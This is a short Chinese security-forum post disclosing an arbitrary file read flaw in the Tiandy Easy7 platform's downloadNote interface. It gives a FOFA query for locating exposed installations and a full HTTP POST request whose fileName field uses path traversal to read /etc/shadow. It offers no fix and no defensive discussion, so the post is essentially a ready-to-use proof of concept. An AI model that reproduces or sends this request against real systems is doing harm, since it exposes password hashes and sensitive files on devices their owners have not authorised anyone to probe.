天地伟业Easy7 downloadNote存在任意文件读取漏洞-网络安全论坛-网络安全-阻击者联盟

天地伟业Easy7 downloadNote存在任意文件读取漏洞

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟8天前发布
30

天地伟业Easy7平台的downloadNote接口存在任意文件读取漏洞,攻击者可通过构造特定请求读取系统敏感文件,导致信息泄露。

 

fofa:app=”Tiandy-Easy7″

d2b5ca33bd20251129075500

d2b5ca33bd20251129075507

POST /Easy7/rest/file/downloadNote HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: keep-alive
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

fileName=/../../../../../../etc/shadow&fullName=1

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面